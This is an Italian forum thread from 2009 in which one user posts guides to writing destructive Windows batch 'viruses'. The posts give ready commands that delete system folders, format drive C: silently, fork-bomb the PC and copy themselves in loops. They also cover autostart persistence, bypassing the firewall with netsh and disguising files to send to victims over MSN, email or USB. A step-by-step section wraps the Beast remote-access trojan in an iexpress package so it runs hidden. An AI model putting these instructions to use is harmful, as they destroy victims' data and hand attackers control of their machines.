pess 282 posts Wednesday, 02. September 2009 12:40PM

Come ti cancello Windows con un file Batch
Noi non possiamo affermarlo in quanto non abbiam mai provato ma alcuni sono della
convinzione che per cagionare danni irreversibili ad un sistema basato su Windows NT (quindi i
S.O. a rischio sono Windows NT, 2000, XP, 2003), sufficiente editare col blocco note un file
batch (con estensione .cmd o .bat) ed inserire al suo interno una breve lista di comandi.
Se inseriamo per esempio, questi comandi

Cancelleremo solo il contenuto di quelle due directory e quindi lo script utile ma non
distruttivo.
Mentre se invece trascriviamo questi comandi, o anche solo i seguenti (facendo notare che, non
solo il percorso utente dovrebbe essere indicato cos %systemdrive%\Documents and
Settings\Nome Utente ma che la stessa directory trascritta nello script, ovvero Pinco Pinco, in
realt non assolutamente presente nel sistema), linterprete dei comandi (CMD.exe), anzich
segnalare lassenza di tale percorso e fermare lazione (cosa tra l'altro normale dal momento
che il Pc fa quello che gli diciamo di fare), comincia ad eseguire la cancellazione di tutte le
directory presenti sul sistema non incluse nel file batch.
Per esempio:
C:\Programmi, C:\Program Files, C:\Windows, percorsi utente, ecc.
Cosa che con Windows 98, non possibile fare, a meno che non si scrivono tutti i percorsi, uno
per uno.
Inutile dire che, visti i totali privilegi di CMD.exe, anche i files in uso e di sistema, verranno
eliminati in maniera Silente e Fulminea.
Daltronde lo stesso metodo con il quale si pu eliminare una cartella oppure uno o pi file,
che
Windows non ci permette di cancellareperch in uso. Il risultato?
In pochi secondi e senza che il sistema faccia nulla per impedirlo, viene fatta tabula rasa di una
valanga tra files di sistema ed utente, cosi che al riavvio Windows non sar pi utilizzabile.
Il file batch pu essere scritto in molteplici altri modi non questo il punto. Il guaio che
esso
facilmente eseguibile, in ambiente Windows (anche da remoto), senza che lutente ne abbia la
consapevolezza, n tantomeno possa far nulla per impedire o limitare il danno.
In realt su di un errore di percorso nello script (creato ad hoc) che, in buona sostanza, si
fonda la
possibilit di danneggiare un sistema basato su kernel NT. Non necessario quindi, ribadiamo,
inserire lelenco dei percorsi utente o le directory di sistema, come alcuni eccelsi esperti di
sicurezza hanno eccepito.
In Windows 95, 98, Millennium, non esistono percorsi utente, quindi tale peculiarit, alla luce
di
quanto detto, risulta essere un vantaggio, in quanto vero che con un file batch possiamo
cancellare dei files o directories di Windows 98 ad esempio, ma in quei sistemi operativi devo
scrivere gli esatti percorsi e tutti quelli che voglio cancellare, altrimenti il file batch, attraverso
linterprete dei
comandi (command.com) non cancella un bel niente o si limita a eliminare solo qualche file o
directory, tra quelle scritte correttamente nel file batch.
Con Windows XP diverso. Un conto cancellare con la cognizione di dover inserire TUTTI i
percorsi da cancellare, unaltra questione inserire qualche percorso (due, tre righe di codice,
anche
con nome utente non corrispondente a quello del sistema) per cancellare tutte le altre
directory,
superiori ed annidate.
C da dire che, se abbiamo installato Antispyware, questo ci avvisa, per mezzo di una finestra
a
schermo, che un file batch sta per essere eseguito. Qui, ovviamente, deve intervenire lutente,
che se
d lassenso, si frega con le sue stesse mani.
La possibile soluzione:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
Qui sono presenti i seguenti due valori (stringa e Dword):
CheckExeSignatures=yes
RunInvalidSignatures=dword:00000001
che in definitiva permettono lesecuzione di programmi privi di firma.
Aggiungendo le seguenti voci, si dovrebbe, in linea teorica, poter impedire almeno il download
e
lesecuzione di programmi che utilizzano files con estensione .bat, .com, .cmd, .ins:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
CheckExeSignatures=yes
RunInvalidSignatures=dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
SaveZoneInformation=dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
LowRiskFileTypes=.zip;.rar;.nfo;.txt;.exe;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.
m
ov;.mp3;.m3u;.wav; HighRiskFilesTypes=.bat;.com;.cmd;.ins
E comunque una soluzione facilmente scavalcabile, visto e considerato che nel file malevolo,
potrebbe essere inserita una stringa contenente parametri da inserire nel registro prima
dellesecuzione del codice dannoso per il sistema, come nellesempio qui di seguito.
Windows Registry Editor Version 5.00
;Thrusted zones
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
CheckExeSignatures=no
RunInvalidSignatures=dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments
SaveZoneInformation=dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
LowRiskFileTypes=.zip;.rar;.nfo;.txt;.exe;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.
m
ov;.mp3;.m3u;.wav;.bat;.com;.cmd;.ins
HighRiskFilesTypes="
Allora per mandare in TILTWindows XP ed affini, non servono conoscenze spropositate, n
sistemi di intrusione complicatissimi, ma sufficiente una comunissima serie di comandi
assimilabili dal vecchio MS-DOS. Cos, mentre in tanti si arrampicano sugli specchi per
individuare
falle di vario genere, i sistemi basati su kernel NT, sono suscettibili di danni irreversibili,
adoperando comandi DOS, al pari dei pi datati Windows95,Windows 98,Windows Millennium.

pess 282 posts Wednesday, 02. September 2009 04:06PM

Creare, spedire e far danni con batch
Virus Per Cancellare Un File
Aprite il blocco note
Incollateci 1 dei seguenti codici::
@ERASE /comando "C:\percorso\percorso *.*"
@DEL /comando "C:\percorso\percorso *.*"
FUNZIONI:
@ERASEe@DEL = Sono per cancellare file
/comando= Bisognerebbe inserire 1 o pi comandi tra questi:
/P= Chiede conferma prima di eliminare ogni file.
/F = Forza l'eliminazione dei file di sola lettura.
/S = Elimina i file specificati da tutte le sottodirectory.
/Q = Modalit silenziosa, non chiede conferma per eliminazioni globali.
/A = Seleziona i file da eliminare in base agli attributi.
*.* = Il primo asterisco serve per cancellare tutti i file con un certo nome, come:
eversor.*
*.* = Il secondo asterisco serve per cancellare qualsiasi tipo di estensione di un file, come:
*.txt
Quindi, in sostanza se dobbiamo cancellare il file "eversor" in .txt sul desktop, faremo:
@ERASE /S /Q "C:\Programmi\Documents and settings\L.H.S.\Desktop\eversor.txt *.txt"
Virus Per Cancellare Una Cartella
Aprire il blocco note
Inserirci dentro il seguente codice:
@RD /s /q C:\Percorso_Cartella
Salvare in .bat
FUNZIONI:
@RD Serve in questo caso per cancellare una cartella, mentre @DEL e @ERASE come abbiamo
viato sopra erano per il File, @RD per cartella.
Per Formattare C(l'unit non deve essere in uso)
Aprire il blocco note
Inserirci dentro il seguente codice:
format C: /autotest /q /u
Salvare in .bat
FUNZIONI:
Questo batch formatta il disco c: (in questo caso ma si pu applicare anche a qualsiasi altra
unit ovviamente), senza chiedere conferma (/q) e non permette di essere bloccata piu avanti
(/u)
Virus Per Disconnettere/Riavviare/Spegnere il PC
Aprire il blocco note
Inserire dentro il seguente codice:
shutdown -comando
Salvare in .bat
FUNZIONI:
Il (-comando) pu essere sostituito dai seguenti:
-i : Attiva l'interfaccia utente grafica
-l : Disconnette l'utente
-r : Riavvia il PC
-s : Spegne il computer
-t xx: Queste (xx) sarebbero i secondi di attesa prima della chiusura di Windows
-f : Chiude le applicazioni ancora aperte
Per Far Impallare Il PC
Aprire il blocco note
Inserire dentro il seguente codice:
START
START
START
START
START
START
START
START
ecc...
Salvare in .bat
FUNZIONI:
Se aprite il DOS (Start--->Esegui--->cmd) e scrivete START, a sua volta vi apre di nuovo il
prompt.
Che succederebbe se scriveste STARTalmeno 500 volte (MAGARI COL NOSTRO FLODDER
SPECIALE) salvate in batch e lo mandate alla vittima?
Vi immaginare!
Trasformare Il .bat In .exe
Scaricate il seguente programma: Batch To Exe
Apritelo e scegliete le opzioni,
si pu anche cambiare l'icona del file
Aumentare Il Peso Del Batch
Aprire il blocco note
Incollarci dentro il codice
3) Aggiungere il codice:
@REM parole_a_caso_ma_tante
Salvare in .bat
FUNZIONI:
Allora si dia il caso che il comando@REM, serva per "Inserire Commenti", ma se noi al posto dei
commenti mettiamo ad esempio, 500 volte la lettere aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, non
faremmo altro che aumentare il peso del batch.
Variabili:
set x=3
verr impostata la variabile xcon valore 3
set /P x=
una riga d'imput definir la variabile
set /a x=x+1
la variabile x uguale a se stessa +1 (contatore)
da qui ne deriva il bat
set x=0
:1
copy nome.bat nome%X%.bat
set /A x=x+1
goto 1
Cambiare password via riga di comando
net user %USERNAME% pwd
dove (%USERNAME%) la variabile che indica l'user in uso e (pwd) la nuova password.
Salvare un file .bat nell'esecuzione automatica in
modo che parta ad ogni avvio del computer
Aprire il blocco note
Aggiungere il seguente codice:
echo comando batch?> C:\Documents and settings\%USERNAME%\menu
avvio\programmi\esecuzione automatica\nomefile.bat?
FUNZIONI:
Il segno maggiore (>) serve a salvare l'output di un comando batch in un altro file, in questo
caso il nostro (nomefile.bat).
Il comando usato in questo caso (echo?) che serve a stampare a schermo una scritta.
Al posto di (comando batch?) dovremmo inserire il comando da utilizzare all'avvio del
computer.
In questo modo il (comando batch?) sar la scritta di output del comando (echo?) e
verr quindi salvato nel nostro (nomefile.bat) nell'esecuzione automatica.
Ci che segue il segno ((>?) e il percorso dove verr salvato il file .bat e la variabile
(%USERNAME%) sostituisce il nome utente del computer.
Comandi per il registro:
REG EXPORT HKLM\Software C:\nomefile.txt
In questo modo esportiamo una parte di registro che in queso caso (Hkey Local
Machine\Software) in C:dentro ad un file al quale daremo un nome a caso, e l'estensione che
pi ci aggrada...(reg quella principale, poi txt, html etc...)
REG IMPORT "nomefile.reg"
In questo modo importiamo il file di registro, nel registro appunto.
REG DELETE HKLM\Software
Eliminiamo la chiave Software e le sue sotto chiavi dal registro (non fatelo, MAI! ammeno che
non avete un back-up)
Questi sono i pi importanti.
Altri comandi li trovate digitando:
reg /?
Bypassare il firewall di windows:
netsh firewall add allowedprogram C:\KillBox.exe ENABLE
dove al posto di C:\KillBox.exeinseriamo il percorso del programma
Comando per terminare i processi:
taskkill /f /im "nomeprocesso.exe"
Comando per terminare i processi:
taskkill /f /im "nomeprocesso.exe"
Comando per terminare i servizi:
net stop "nome servizio"
Invece per farlo ripartire:
net start "nome servizio"
Questi sono i comandi del ms-dos:
assign - reindirizza tutte le richieste a un drive, verso un altro drive
attrib - visualizza o modifica gli attributi dei file
backup - crea una copia di sicurezza di uno o pi file su una serie di floppy-disk
break - abilita o disabilita l'interruzione o l'esecuzione fornita da CTRL C e CTRL BREAK
cd - entra in una directory
chdir - cambia la directory corrente o ne visualizza il nome
chkdsk - analizza il contenuto del disco e visualizza una relazione sul suo stato
cls - cancella il contenuto della schermata (questo comando non distruttivo)
color - permette di impostare il colore dello sfondo e del testo
command - avvia un nuovo interprete dei comandi MS-DOS
comp - confronta il contenuto di un file o gruppo di file con altri
copy - copia uno o pi file in un altro punto del disco
ctty - cambia la console di input/output da cui vengono impostati i comandi
date - visualizza e permette di aggiornare la data
defrag - riorganizza i file in un disco rigido per ottimizzarne l'uso
del - cancella uno o pi file
deltree - elimina una directory e tutti i file e le sottodirectory in essa contenute
dir - visualizza il contenuto di una directory
discopy - copia il contenuto di un disco floppy in un altro disco floppy
diskcomp - confronta il contenuto di due dischetti dello stesso tipo
doskey - ripete gli ultimi comandi digitati
echo - abilita o disabilita l'eco da file batch
edit - avvia MS-DOS Editor per creare o modificare i file ASCII
edlin - avvia un editor di righe di testo. Per magg. informazioni (Prompt comandi e edlin/?)
emm386 - abilita o disabilita la memoria espansa di EMM386
erase - cancella uno o piu file specificati
exe2bin - converte in formato binario un file eseguibile
exit - provoca l'uscita da un interprete di comandi secondario per ritornare ad un interprete di
comandi o ad un programma precedenti
expand - decomprime uno o pi file compressi
fastopen - accellera l'apertura di un programma
fc - confronta il contenuto di due file
fdisk - configura un disco rigido creando le partizioni, per l'utilizzo di MS-DOS
find - ricerca una sequenza di caratteri all'interno di uno o piu file
for - permette di eseguire in modo iterattivo comandi di MS-DOS
format - formatta un disco per l'utilizzo di MS-DOS
goto - trasferisce l'esecuzione ad una determinata posizione di un file batch
graftabl - carica in memoria i caratteri ASCII non BIOS per i modi grafici
help - visualizza la guida di MS-DOS. ATTENZIONE la guida troppo lunga per essere
visualizzata in una sola schermata, quindi per visualizzarla schermata per schermata digitare
help|more (il simbolo "|" il tasto alla sinistra tasto uno (1) altrimenti alt+124 = "|" e
scrivere more
hexDump - lista in formato esadecimale il contenuto di un file, byte per byte
if - condiziona l'esecuzione di un comando in un file batch
ipconfig - visualizza configurazione IP di Windows. ATTENZIONE per maggiori informazioni
digitareipconfig/all
join - unisce un drive di disk ad una directory vuota su di un altro drive
keyb - configura la tastiera per la lingua specificata
label - crea, modifica o elimina l'etichetta di volume di un disco
md - crea una directory
mem - visualizza la quantit della memoria usata e quella libera del sistema
mode - stabilisce le modalit di visualizzazione e trasmissione per la stampante
more - permette la visualizzazione di informazioni, (files, pagine, o altri tipi di dati) che per la
loro grandezza (insieme di righe) devono essere visualizzate con pi schermate alla volta.
ATTENZIONE necessario che "more" sia preceduto dal simbolo "|" ALT+124. Ex. help|more.
Prestare ulteriore ATTENZIONE in alcuni computers o Sistemi operativi anteriori al MS-DOS 6.0
non riconoscono il simbolo "|" , perci, necessario digitare il simbolo "/" seguito da una p. per
esempio help/p
path - visualizza o imposta un percorso di ricerca per file eseguibili
pause - provoca una pausa nell'esecuzione di un file batch per consentire un input da operatore
print - stampa un file di testo
prompt - cambia il prompt dei comandi di MS-DOS
rd - cancella una directory
recover - recupera un file o un intero disco con settori danneggiati
rem - visualizza commenti durante l'esecuzione di un file batch
ren - rinomina uno o pi file
replace - sostituisce i file
restore- ripristina dai dischi di back-up un certo numero di file
rmdir - rimuove una sottodirectory vuota
select - copia il dischetto MS-DOS per creare una copia di lavoro per la nazionalit selezionata
della tastiera
set - assegna un valore di sostituzione ad un parametro con chiave presente in un programma
applicativo o in un file batch
share - installa la condivisione ed il bloccaggo dei file MS-NET
shift - aumenta il numero di parametri sostituibili in un file batch
shutdown - arresta o riavvia il sistema
sort - ordina i dati alfabeticamente, in un senso o nell'altro
subst - associa un percorso ad una lettera di unit
sys - copia i file di sistema di MS-DOS e l'interprete dei comandi sul disco specificato
time - visualizza e consente di modificare l'ora
title - permette di impostare il titolo della finestra
tree - visualizza tutte le directory ed i percorsi del drive specificato
type - visualizza il contenuto di un file di testo
undelete - ripristina i file cancellati precedentemente con il comando del
unformat - ripristina i dati di un disco cancellati con il comando format
ver - visualizza la versione di MS-DOS in uso
verify - abilita la verifica dei dati in scrittura
vol - visualizza l'etichetta e il numero di serie di volume del disco
win - esegue Windows
xcopy - copia i file e la struttura delle directory (ad esclusione dei file nascosti e di sistema)
Per rendere un file autoeseguibile ad ogni avvio di winzozz :
echo (inserite il comando)>"%USERNAME%\Menu Avvio\Programmi\Esecuzione
automatica\(nome).bat"
echo hacked>"%USERNAME%\Menu Avvio\Programmi\Esecuzione
automatica\hacked.txt(questo si puo anke omettere serve solo x scrivere hacked in un txt ke
poi si visualizzera alla avvio)
rende il file all avvio dal registro di sistema:
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>
"file.reg"
@echo "nome"="disco:\\percorso\\file da fare eseguire all'avvio.*" >> "file.reg"
REG IMPORT file.reg
altra cosa che vi piacer molto per vedere l'indirizzo IP della vittima con cui state chattando
dovete eseguire queste operazioni:
1- aprite il prompt dei comandi
2- digitate la seguente stringa:netstat -na
3- andate in cerca dell'ip che vi serve
Ecco un altra cosa..non sapete come inviare i virus?
Ci sono diversi modi per farlo elenco quelli che conosco:
1-msn: la cosa pi niubba che si possa fare ma alcuni lo fanno x iniziare...non ci vuole molto
inviate il vostro bel file ad un contatto facendolo passare x qualkosaltro.
2-mail bomb: pi semplice di cosi...inviate una mail con allegato il vostro virus (dovete
camuffarlo e dovete camuffare anche il vostro indirizzo prima)
3-p2p: sinceramente se vi azzardate a mettere i vostri virus in rete giuro che se vi trovo vi
uccido visto che io sono uno che ha il mulo attacato 25 ore su 24...
4-chiavette usb o cd o floppy...questo un metodo semplice ma che richiede soldi e
ingegnio...soldi xk cmq un cd o una chiavetta costa e ingegnio xk non potete dare la
chiavetta con il virus ad un amico x fargli uno scherzo xk alla fine sa chi andare a cercare!
Un'altra domanada che fate spesso come camuffare un virus...vi dico che metterlo in una
immagine serve a poco xk lo script x farlo il seguente :
copy /b C:\nomeimmagine.jpg + C:\file.rar C:\nomeImmagineGenerata.jpg
come vedete noi alleghiamo all'immagine un archivio .rar contenente il virus...ma quando apri
l'immagine non succeder niente perch il file.rar non si apre da solo!
x camuffarli credo che sia pi utile cambiare l'icona...se googlate un pochino troverete milioni
di programmi.
Ecco un'altra chicca...per teminare i processi lo script il seguente:
taskkill /F /IM (nomeprocesso).exe
esempio:
taskkill /f /im wmplayer.exe
in questo modo se avete windows mwdi a player aperto si chiuder all'istante senza preavvisi...
NB. Okkio agli spazi.
Es.
Far cancellare un file sul desktop dal menu d'avvio.
@DEL /S /Q /F "C: eversor.txt"
Usando evesor cancella tutti quelli che sono sia sul desktop che in C... e addirittura nel menu
d'avvio.
Quindi:
@DEL /S /Q /F "C: nuova cartella eversor.txt" COSI' NON FUNZIONA
@DEL /S /Q /F "C: nuovacartella eversor.txt" COSI' SI!
Ora se dal menu' d'avvio vogliamo cancellare solo il desktop
magari di un certo FABIO...
la dicitura non sar:
C: Programmi Documents and settings FABIO Desktop eversor.txt
Ma:
C:Documents and settingsFABIODesktopeversor.txt


scarica la guida:
Formati ed estensioni di file che mascherano i virus




pess 282 posts Wednesday, 02. September 2009 04:10PM



Worms e Trojans



Virus:
I virus sono come sapete gi dei programmi con al loro interno stringhe nocive In pratica
vengono creati con lo scopo di infettare + computer possibili Naturalmente i loro creatori
sono lamers o crackers Comuque Lo scopo di un virus quello di diffondersi il + possibile
e di infettare il maggior numero di file in un sistema Esso cerca in tutti i modi di nascondersi
dallantivirus, a differenza dei trojan, ke vedremo dopo.
Ecco le tipologie di virus, con la relativa spiegazione:
Boot Virus
Virus ke infettano il lettore di Floppy e di conseguenza tutti i floppy ke si infilano x essere
letti
File Virus
Virus ke infettano i file exe, com, bat, dll, ecc
Macro Virus
Grossi Virus, scritti in Vb (visual basic)
Polymorphic virus
Virus ke cambiano il loro codice e le loro funzioni ogni volta ke si riproducono
Stealth Virus
Virus ke utilizzano le tecnike + disparate x sfuggire al controllo dellantivirus
Virus in the wild
Virus sfuggiti al controllo del loro creatore selvaggi Ancora oggi viaggiano x la rete
Worms:
Gli worms sono sempre dei virus Il loro intento per quello di distruggere il + possibile Di
solito arrivano via mail perch? Perch gli worm hanno una particolare funzione Appena
infettano il pc, aprono loutlook e si autospediscono a tutti i contatti presenti in lista Come i
famosi Happy99, Melissao I love you, i 3 dellapocalisse Questi worms hanno segnato la fine
di migliaia di pc Temutissimi Lo stesso I love you (creato da una donna ) ha infettato lFBI
Trojan:
Nome Completo: Trojan Horse Sono dei programmi come sapete che hanno lo scopo esplicito
di fare il + danno possibile Ne esistono di varia natura Molti per hanno una funzione
implementare Quella di far entrare lhacker nel pc della vittima infetta da un determinato
trojan In pratica Un trojan di questo tipo si divide in 2 parti: il server e il clientIl server il
virus vero e proprio, va aperto sul pc vittima, mai sul nostro il client un programmino che si
collega al server istallato sulla vittima e ci permette di entrargli dentroNaturalmente ci sono
gli ostacoli il firewall e lantivirusMa purtroppo i lamers hanno pensato proprio a tutto
Citandone uno: BeastQuesto ha la funzione, appena aperto dalla vittima, di cancellare
lantivirus e disattivare il firewall cio spianare la strada allattacker come se non bastasse
poi questo trojan invia una mail con il nostro ip alla casella postale dellattacker che,
disponendo di tutto il necessario, entra nel nostro pc e fa casiniEsistono inoltre dei metodi x
nascondere il trojan al momento del download, cio prima ke venga aperto e infetti il pc Cito
ijoiner, programmi che uniscono 2 file exe, per esempio un trojan e un giochino di carte
Hanno la funzione di farvi scegliere quale dei due programmi avviare mostrandolo alla vittima e
quale avviare di nascosto Un altro metodo, meno da lamer, quello di creare un archivio
autoestraente coniexpress
Un argomento che tratteremo dopo
Ok Fine della teoria Ora impariamo a creare piccoli virus in dos e a creare un archivio
autoestraente per le nostre malefatte Iniziando subito col DOS
Virus in DOS:
Allora Non parleremo di creare virus che si diffondono in un pc e infettano tutto Tratteremo
invece il DOS e in particolare dei programmini in .bat che appena aperti cancellano qualcosa
Il comando in dos per cancellare una directory (in winXp) RD per un file DEL
1 Esempio
Apriamo un doc di txt e scriviamo
@RD /s /q C:/Windows/System
Andiamo su file, salva con nome, e chiamiamolo virus.bat salviamolo Non apparir salvato
un documento di testo, ma uno strano file cos? un file bat, appunto se lo apriamo, la
cartella System verr cancellata Ma spieghiamo passo passo che abbiamo fatto
@ Indica che vogliamo eseguire un comando
RD indica che vogliamo cancellare una directory
ma se noi scriviamo solo @RDC:/Windows/System, si aprir una finestra del dos che ci chieder
se procedere con la cancellazione o meno.
Ecco invece che aggiungendo (/s/q) allora, gli diciamo di procedere direttamente
C:/Windows/System ovviamente la cartella che verr cancellata
2 Esempio
Vogliamo ad esempio cancellare telnetdal Pc Sapete che senza telnet il Pc nn pu connettersi
a internet Allora se lo cancelliamo addio internet fino a che non si scopre che stato
cancellato e ne si mette uno nuovo Ma finch non capisce che stato cancellato
Basta scrivere nel doc di txt
@DEL /s/q C:/Windows/System32/telnet.exe
La cosa la stessa Cambia solo il comando, ke serve x cancellare un file
3 Esempio
Vogliamo cancellare pi di una cosa Ad esempio vogliamo cancellare telnet e la cartella
System?
Allora scriviamo
@RD /s /q C:/Windows/System
@DEL /s/q C:/Windows/System32/telnet.exe
Salviamo sempre in .bate il nostro virus pronto
Potremmo continuare allinfinito, ma non ci va Eccovi quindi una lista dei comandi DOS con
relativa spiegazione, che potrete usare a vostro piacimento
ATTRIB Visualizza o modifica gli attributi dei file.
CD Cambia la directory corrente o ne visualizza il nome.
CHDIR Cambia la directory corrente o ne visualizza il nome.
CHKDSK Verifica il disco e visualizza una relazione sul suo stato.
CLS Cancella il contenuto della schermata.
COMMAND Avvia un nuovo inteprete dei comandi MS-DOS.
COPY Copia uno o piu' file in un altro punto del disco.
DEFRAG Riorganizza i file su un disco per ottimizzarne l'uso.
DEL Elimina uno o piu' file.
RD Elimina una directory e tutti i file e le sottodirectory in essa contenuti.
DIR Visualizza l'elenco dei file e delle subdirectory di una directory.
DISKCOPY Copia il contenuto di un disco floppy in un altro disco floppy.
DOSKEY Modifica righe di comando, chiama comandi di MS-DOS e crea macro.
EDIT Avvia MS-DOS Editor per creare e modificare i file ASCII.
EMM386 Abilita o disabilita la memoria espansa di EMM386.
EXPAND Decomprime uno o piu' file compressi.
FDISK Configura un disco rigido per l'utilizzo con MS-DOS.
FORMAT Formatta un disco per l'utilizzo con MS-DOS.
KEYB Configura la tastiera per la lingua specificata.
LABEL Crea, modifica o elimina l'etichetta di volume di un disco.
MD Crea una nuova directory.
MEM Visualizza la quantit di memoria usata e libera del sistema.
MKDIR Crea una nuova directory.
MORE Visualizza i dati di output una schermata per volta.
PATH Visualizza o imposta un percorso di ricerca per i file eseguibili.
PRINT Stampa un file di testo consentendo di usare altri comandi di MSDOS.
PROMPT Cambia il prompt dei comandi di MS-DOS.
RD Rimuove una directory.
REN Rinomina uno o piu' file.
RENAME Rinomina uno o piu' file.
REPLACE Sostituisce i file.
RMDIR Rimuove una directory.
SUBST Associa un percorso ad una lettera di unit.
SYS Copia i file di sistema di MS-DOS e l'inteprete dei comandi sul disco specificato.
TYPE Visualizza il contenuto di un file di testo.
UNDELETE Ripristina i file cancellati precedentemente con il comando DEL.
UNFORMAT Ripristina i dati di un disco cancellati con il comando FORMAT.
VER Visualizza la versione di MS-DOS in uso.
VOL Visualizza l'etichetta e il numero di serie di volume del disco.
XCOPY Copia i file (ad esclusione dei file nascosti e di sistema) e la struttura delle directory
Hide Trojan Horse con iexpress:
Allora raga Quello che vi stiamo per dire da veri lamer, quindi evitate di farlo contro qualche
vostro amico Possiamo iniziare Il trojan che prenderemo come esempio il Beast, che se
attivato, cancella antivirus e disattiva firewall Quindi occhio
NB Il trojan nel pacchetto non viene rilevato
Andiamo in Start Esegui, scriviamo iexpress e premiamo invio Uscir una schermata
Eimpostata gi su Create new Self Extraction Directive file Possiamo per ci premere
avanti
Qui mettiamo Extract File Onlye andiamo avanti Package Title ScriviamoNomeProgramma
e andiamo avanti Lasciamo no prompt e procediamo di nuovo lasciamo com e andiamo
avanti ottimo qui vanno i file mettiamo il server dibeast che lo chiameremo server.exee
qualcosaltro in modo da far ingrandire il pacchetto e far credere alla vittima che veramente un
programma Possiamo ad esempio mettere una 10ina di foto (insieme a server) una volta
che gli abbiamo messi usando il tasto ADD, andiamo avanti ottimo siamo arrivati al
culmine dobbiamo mettere il nome del file che dovr essere eseguito (il server) che deve
essere per forza un exe allora scriviamo in Istall Programserver.exe premiamo avanti e di
nuovo avantiancora avanti, non mettete il messaggio altrimenti dar errore alla vittima e non
servir a niente tutta sta fatica ora dobbiamo mettere il percorso dove vogliamo che sia
creato il file e il nome Clicchiamo su Browse, andiamo sul desktop e scriviamo come nome
NomeProgramma Salvae avanti Lasciamo only Restarti f Needed e andiamo avanti di
nuovo avanti e ci troveremo con la finestra Create Package Finalmente premiamo avanti e il
nostro pacchetto maligno stato creato Clicchiamo su Finee andiamo a vedere sul desktop il
bel risultato.


questa guida a solo scopo
informativo